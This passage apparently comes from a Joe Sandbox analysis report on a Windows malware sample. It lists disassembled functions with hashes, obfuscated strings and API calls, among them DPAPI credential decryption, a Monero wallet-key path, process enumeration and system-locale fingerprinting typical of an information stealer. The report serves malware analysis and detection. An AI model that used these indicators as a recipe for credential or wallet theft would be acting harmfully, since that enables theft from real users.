                          • Instruction ID: 127b8985b02d5d0873949775f36c96eeff28237dd8d4d55a39556b73be37f27b
                          • Opcode Fuzzy Hash: 0a7fdb78607086a42ff57b10316f80dccb247349f5a00988baf1d2449454c88a
                          • Instruction Fuzzy Hash: 3DB238F3A082109FE304AE2DEC8567AFBE9EF94720F1A453DE6C4C7744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ~$$o?S$4<O$V<w0$[$0o$c$~?$p3K$wt{g
                          • API String ID: 0-1811294496
                          • Opcode ID: c91f58355619ce8ef608a7838a1a3c24529d5e6a5a93e5b1dc5e8252942753e9
                          • Instruction ID: 8a3045d97897c1bb81b57b11c335180500696114d19637c831a1295e6d78dda9
                          • Opcode Fuzzy Hash: c91f58355619ce8ef608a7838a1a3c24529d5e6a5a93e5b1dc5e8252942753e9
                          • Instruction Fuzzy Hash: 00B205F3A0C2049FE3046E2DEC8567ABBE5EF94720F1A493DEAC5C7744EA3558048697
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00B105AF), ref: 00B07BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00B07BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B07C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B07C62
                          • LocalFree.KERNEL32(00000000), ref: 00B07D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: a332e54496d375f670d3e93069bab158e44db25897119f7fe7087e4e61e4e5ec
                          • Instruction ID: 7b0d6eef04113d08b829c9d1006c996b9ec1aa95deb80d19a4649f33e2112836
                          • Opcode Fuzzy Hash: a332e54496d375f670d3e93069bab158e44db25897119f7fe7087e4e61e4e5ec
                          • Instruction Fuzzy Hash: A2416C71950218ABDB24DB94DC89BEEBBB8FF54700F2045D9E009A22D0DB346F85CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *!~$2kc$o'7~$q}<$sH|\$sgf'$|`e{
                          • API String ID: 0-528901777
                          • Opcode ID: 48babd37685059f62f03d5a3ccbbf883321baa9254eb6d361bd2bd02f9f9dac2
                          • Instruction ID: 7121bc2f7cc6c7176a834b88d526af9b3a045b15dafd8c82e19627c91ce1b188
                          • Opcode Fuzzy Hash: 48babd37685059f62f03d5a3ccbbf883321baa9254eb6d361bd2bd02f9f9dac2
                          • Instruction Fuzzy Hash: 98B25AF3A082149FE3046E2DEC4567AB7E9EF94720F1A863DEAC5C7744EA3558018693
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %u*$1VW[$=u^$A3w$Jw~_$Uj,z$n:z
                          • API String ID: 0-2621347867
                          • Opcode ID: f1627583fe8ef58f7764e5c9dc4ed919ebf0a4650ca17227e8741e27cfda21ec
                          • Instruction ID: 36796f21333d4dc53b4e90d430ea644a4a643adc5825e61764240fcaa9d7d2f4
                          • Opcode Fuzzy Hash: f1627583fe8ef58f7764e5c9dc4ed919ebf0a4650ca17227e8741e27cfda21ec
                          • Instruction Fuzzy Hash: EEB228F360C204AFE3046E2DEC4567AFBE9EF94720F1A493DEAC483744EA3558158697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >)w$J};_$W_|$h[u$t5oz$tWe-$)_
                          • API String ID: 0-2342638888
                          • Opcode ID: 6b67f7004f23156be752117f1ee5b5662f5ee00f944bbe8d17582764cdc0f7e7
                          • Instruction ID: 5e274316ff9b0c34e4785c447109f9dc750c0b422e2c37718b7e200d155339b2
                          • Instruction Fuzzy Hash: 644209F360C2009FE304AE2DDC8576AFBE9EFD4760F1A892DE6C4C7744E63598058696
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B10D73), ref: 00AFE4A2
                          • StrCmpCA.SHLWAPI(?,00B114F8), ref: 00AFE4F2
                          • StrCmpCA.SHLWAPI(?,00B114FC), ref: 00AFE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8179a203b683e91e646ca51f1e15e8efc9406152b561b4fbad3ebc37c56ca114
                          • Instruction ID: 9e74a7a4ae78d9c29d29d220dc4ca9219ed5d38ccec8e862dfce1182dd9ffd5d
                          • Instruction Fuzzy Hash: F9124871A103189ADB14FB60DD96EED77B9AF54300F4089E8B50AA61D1EF309F49CF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2G*c$7-r$C2M}$_No>$`bk$w8?/
                          • API String ID: 0-487351142
                          • Opcode ID: f800422cadcf16fcfe2093aae3b5e7d7cbd0fdb83f6cf0ada82c45e4c06b83f2
                          • Instruction ID: 48fea3052327517c4986422adfbf9d92dc81dd98f9ca3fd7571c51d526150a22
                          • Instruction Fuzzy Hash: 67B2F4F360C200AFE3086F29EC8567AFBE9EF94720F1A492DE6C583740E63558458797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "$mw$CTmy$Hx|k$ao{$kpwu$l^v
                          • API String ID: 0-1836109566
                          • Opcode ID: 0c9baf65c7141bcd56021d801005e76c8804a6287c18a70bd60904c0ba716891
                          • Instruction ID: 203846e85e9254cc99f10f296f7828d7c0c79675229b4b402e4c1106de7572b2
                          • Instruction Fuzzy Hash: A5B227F360C204AFE708AE2DEC8567AFBE9EF94320F16453DE6C4C3744EA7558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '%]}$D,wo$J~o7$rvo$l/_$_{
                          • API String ID: 0-2591795313
                          • Opcode ID: 0ead957c881a568f874c16a0c7cc1a19ed4e3209e9e572e7270df1122f42ea94
                          • Instruction ID: ee6d2fb86c9cbb7a88acc2ceaf0141baabc698ee72d303ea00394ec93f60ecd1
                          • Instruction Fuzzy Hash: 44B2C3F260C200AFE704AF29DC8567AFBE9EF94720F16892DE6C4C7744E63558418B97
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AFC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AFC87C
                          • lstrcat.KERNEL32(?,00B10B46), ref: 00AFC943
                          • lstrcat.KERNEL32(?,00B10B47), ref: 00AFC957
                          • lstrcat.KERNEL32(?,00B10B4E), ref: 00AFC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 60bd92fa9af460ef7e4b9aef188f3faf7440cd5936929346b82a6266b3dbdb87
                          • Instruction ID: 089b63e6df4266a9eacb4b9ad73982a02545eab6d3d0620d1cb2add0c734b71e
                          • Instruction Fuzzy Hash: CA4142B5A0431EDBDB10DF94DD89BFEB7B8BB44704F1045A8F509A6280D7B45A84CFA1
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AF724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AF7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AF72A4
                          • LocalFree.KERNEL32(?), ref: 00AF72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a2c6a97bb11f5cfb8b1fee899d9dcdec1a32c3f2877d2cf0d210cffacf7cff86
                          • Instruction ID: 795de38a9cddc78b94c7623cf26e30ecadd9151092712f2c0356cf4139e66e74
                          • Instruction Fuzzy Hash: 650100B5B40308BBDB10DBD8DD49FAD77B8AB44700F104159FB45EA2C0D6B0AA008B65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B0961E
                          • Process32First.KERNEL32(00B10ACA,00000128), ref: 00B09632
                          • Process32Next.KERNEL32(00B10ACA,00000128), ref: 00B09647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00B0965C
                          • CloseHandle.KERNEL32(00B10ACA), ref: 00B0967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 9092791a836d5e6b2ef7c21d7fd745db7b4524b2631538ae978882743c74bed3
                          • Instruction ID: 6bec792f12ceb522f460546b3e1bf305d4b164cbff9b08ecf6f2f51edfeabcdb
                          • Instruction Fuzzy Hash: F6010CB5A00308ABCB14DFA5CD88BEDBBF8EB48700F1081D8A945E6390DB359B40CF61
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B105B7), ref: 00B086CA
                          • Process32First.KERNEL32(?,00000128), ref: 00B086DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00B086F3
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • CloseHandle.KERNEL32(?), ref: 00B08761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 321b59a435fa62f88479efc0dfafb6b82cea04deee86074174d640ef656d16fa
                          • Instruction ID: fc0047a46ab0a7fc498f3487d1507578c0d4cb8ead109a8fc38982512e6feb4e
                          • Instruction Fuzzy Hash: 95313C71911318ABCB24EB54CC85FEEBBB8EB55700F1085D9A10AA21E0DB706E45CFA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00AF5184,40000001,00000000,00000000,?,00AF5184), ref: 00B08EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 07d0bee90185fa841f810ff953cc4089f53fc63026461fb4057d8ba345d48cd3
                          • Instruction ID: 1ab836c6a833e837722232dadb2766acb2dc800fa90f76ebc7aa94e064bb7dd0
                          • Instruction Fuzzy Hash: E111DA74200205AFDB00CF64D885FAB3BE9EF89714F109998F9958B290DB75EA41DB64
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AF4EEE,00000000,00000000), ref: 00AF9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00AF4EEE,00000000,?), ref: 00AF9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: b238a1b8059714b7d35f183cda1423059dbaa3c12ff27ef1948db777eeac9319
                          • Instruction ID: 11ce80c2d9112ffebd2695dbdd16d144da16beeba9292bd6de387b1a332129a6
                          • Opcode Fuzzy Hash: b238a1b8059714b7d35f183cda1423059dbaa3c12ff27ef1948db777eeac9319
                          • Instruction Fuzzy Hash: 2F1163B4641308AFEB10CFA4DC95FAA77B5EB89714F208158FA159B390C775A941CB60
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B10E00,00000000,?), ref: 00B079B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B079B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00B10E00,00000000,?), ref: 00B079C4
                          • wsprintfA.USER32 ref: 00B079F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 8def0b37e4f3ebc5807f449804beb998685059698628b1959fdb36947dfc0910
                          • Instruction ID: 7bae3e5f18cacf13fa3cb8b37769fd61e265c3897f42fb1ca8a439098e941999
                          • Opcode Fuzzy Hash: 8def0b37e4f3ebc5807f449804beb998685059698628b1959fdb36947dfc0910
                          • Instruction Fuzzy Hash: 93112AB2A04618ABCB14DFC9DD45BBEBBF8FB4CB11F10415AF645A2290D6395940C7B1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,018AF200,00000000,?,00B10E10,00000000,?,00000000,00000000), ref: 00B07A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B07A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,018AF200,00000000,?,00B10E10,00000000,?,00000000,00000000,?), ref: 00B07A7D
                          • wsprintfA.USER32 ref: 00B07AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 4c9638e9c86b2bee04a3fa9603f764a310f9219a2b3c9bd4e5a16940b5853c06
                          • Instruction ID: d349c6dd63eda9da0bf1f801dfbdf2b0c17e9b22fe93f248e00998292bc3ee97
                          • Opcode Fuzzy Hash: 4c9638e9c86b2bee04a3fa9603f764a310f9219a2b3c9bd4e5a16940b5853c06
                          • Instruction Fuzzy Hash: B1117CB1A45618EBEB209B58DC49FA9BBB8FB04721F1042DAE90A932D0CB741A44CB51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Bl?$RrN;${;
                          • API String ID: 0-279743825
